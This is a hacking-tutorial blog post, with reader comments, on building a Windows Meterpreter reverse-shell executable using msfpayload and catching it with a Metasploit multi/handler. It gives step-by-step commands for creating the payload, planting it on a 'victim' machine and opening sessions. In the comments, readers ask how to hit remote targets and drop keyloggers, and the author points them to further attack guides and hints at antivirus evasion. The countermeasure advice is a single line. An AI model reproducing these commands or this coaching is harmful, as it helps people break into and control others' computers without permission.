Create Simple Exploit Using Metasploit to Hack Windows 7

Create Simple Exploit Using Metasploit to Hack Windows 7


Type : Tutorial

Level : Easy

As I have already wrote on my previous post about how to add a user with administrator rights (you can read the tips and trick here), today I will wrote a simple tutorial to create an exploit for Windows 7 and all Windows.

Everyone love and like the simple way isn’t it? that’s why in my previous tutorial and today tutorial I wrote everything about simple and easy to use ๐Ÿ™‚

The tutorial today we will learn how to create a simple exploit (easy to create and easy to implement ๐Ÿ™‚ ) and how we connect to Windows 7 victim that already executed our simple exploit…simple isn’t it?

Okay let’s start the tutorial.

Requirements :

1. Metasploit Framework 2. Windows XP and earlier Windows version (I use Windows 7 SP1)

Step by Step :

FYI in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 1. Open your terminal console and type the following command :

msfpayload windows/meterpreter/reverse_tcp LHOST= X > Desktop/v4L.exe

Create Simple Exploit Using Metasploit to Hack Windows 7

The above command will create Windows executable file with name "v4L.exe" and will be saved on your desktop.

2. Now you need to copy your newly created v4L.exe to your windows 7 system. If you didn’t know how to share your backtrack 5 folder, you can videw the tutorial how to share folder in your Backtrack (view tutorial here).

3. The next step we need to create a handler to handle the connection that came to our Backtrack system from simple exploit we’ve already created before. Open your Metasploit console, see the picture and type the following command : Create Simple Exploit Using Metasploit to Hack Windows 7 Information :

use exploit/multi/handler --> use the metasploit handler

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

set lhost --> set our local IP address that will catch the reverse connection

exploit -j -z --> start the handler

4. Now you can try to execute the simple exploit we have already copy to windows 7 and see if our handler receiving something or not. Below was the screenshot of my handler when Windows 7 executed the simple exploit : Create Simple Exploit Using Metasploit to Hack Windows 7

I use sessions -l to listing every sessions that already open there. 5. To interact with the available session, you can use sessions -i <session_id>. From there you can do other command as you want.

Create Simple Exploit Using Metasploit to Hack Windows 7

Yes we’re inside the Windows 7 now ๐Ÿ™‚

Countermeasures :

1. Install 3rd party firewall and antivirus that always updated.

Hope it’s useful ๐Ÿ™‚

FYI : There’s still another tutorial I will post later about Hacking Remote Desktop. You can subscribe to get the tutorial by click the button below and provide your e-mail address :

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

(Visited 26,891 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at Love PHP, offensive security and web.
Contact him at me[-at-]

See all posts by || Visit Website :

  • Pingback: How To Enable Remote Desktop Using Command Prompt? | Vishnu Valentino Ethical Hacking Tutorial, Security Tips and Trick()

  • hair

    hi man… nice post ! please help me how to make it remotly? on win xp its possible? 
    please send to my email   *about Hacking Remote Desktop …thanxs a lot i needy learn to working in security test  >X

    • v4L

      yes it’s also possible on win XP

  • BlackTrminatr

    Nice post.. but can you tell me how to do this remotely… I have configured my router for port forwarding but don’t know what to do next..


    • v4L

      You need to understand how exploit and payload work. maybe you can give a try to see the simple explanation in this tutorial http://www./hacking-tutorial/hacking-into-xp-sp3-via-microsoft-office-excel-ms11_021_xlb_bof-vulnerability/ about lport, lhost; and I think this tutorial clear enough for the basic http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • nathan

    hey man, awsome blog!
    Quick question, wondering whether its possible to add a .exe keylogger after the exploit has occured and place it on the victims computer and somehow click it so it activates

    • v4L

      you can view here http://www./hacking-tutorial/create-exploit-using-msfvenom-to-hack-windows-7-sp1/

  • Prakash Tomar

    Hey man i just creatd an account in web hosting site..nd der i redirect my own website url to nw wat i have to do i’m nt getting to hack wan computer..i knw i have to create a payload and listener bt wat bout server..plz help me..

    • v4L

      if you host, then you’ll hack using web app; if you want to hack a victim PC’s, then you need to buy your own dedicated backtrack server or you can view the tutorial here http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

      • Prakash

        Gimme steps using web app..i got stuck..

  • r12

    I am using dongle with dynamic IP. I am using host name from to redirect my dynamic IP address. so I typed this to create .exe file:
    “””msfpayload windows/meterpreter/reverse_tcp X > Desktop/v4l.exe”””

    and then I set up the handler and payload and set the lhost:
    “””set lhost”””

    but when I execute exploit command there’s an error:
    “””Handler failed to bind to″””

    ps: is my current dynamic global IP address

    what should I do? help me plz….

  • r12

    I am able to use msf on virtual LAN. thanks for your tutorials. but I want to do it over internet, FYI I don’t have router, I only have a computer and a dongle. Do you have any idea on error message I have shown you above? oh ya inspite of error, I try to execute the .exe on my friends computer. but there is no session appear on server machine.
    any help would be really appreciated. THANKS

  • gabeapp

    lets say i will be able to get the file on the victims computer how can i use this if the target is on an external location?

    • v4L


  • Hi my friend, i'd like to thank you for this post, and i also appreciate your easy way of explainiing things. However, what's the usefulness of this tutorial since it can NEVER bypass any security measures, and why do you specify this attack to windows 7?? this exe meterpreter can be used on any microsoft system, ONLY of firewalls & antiviruses are disabled ๐Ÿ™

    • v4L

      you didn’t feel the usefulness because you want the fast and easy way ๐Ÿ™‚
      with all of this you also can build a new one without caught by antivirus, but of course for all of it you need an effort to learn more after you know the basic.

  • Ahmed El-Nagdy

    Thanks 4 ur efforts:
    But …
    I am try to run this “exploit” to hake xp-sp3
    The result is:
    msf exploit(ms08_067_netapi) > exploit -j -z
    [*] Exploit running as background job.

    [-] Handler failed to bind to
    [-] Handler failed to bind to
    [-] Exploit failed: Rex::AddressInUse The address is already in use (

    I am waiting ur answer
    Please Accept My Best Regards.

    • v4L


      maybe your previous exploit haven’t killed yet. Try restart your msfconsole.

  • Stanko


    I have two computers, one, my mac which running BT5r3 on VMware fusion and a windows 7 laptop. They are both connected to the same WLAN, same router, everything. Which tutorial do i follow to exploit the windows 7 laptop? Because even though I disable my firewall/AV I’m still having problems on armtiage/fast-track, etc :/

    • v4L


      you can start learn from here http://www./tips-and-trick/install-metasploitable-on-virtual-box/. and you can try use your armitage. we can’t only run armitage and hopw finding a red vulnerable PC when scanning, because nowadays the vulnerability come from 3rd party application. Maybe updating your armitage + metasploit framework is a good idea to start.

  • hacker

    Easy to hack a Window system when you have your hands directly on the machine, not very hard to do! Boot a LIVE version of any linux and you will have the power to DESTROY any local Windows machine, simple as that!

  • phoenix6142

    Great tutorial, thank you. I have success!

  • jp

    it says that I cant open the aplication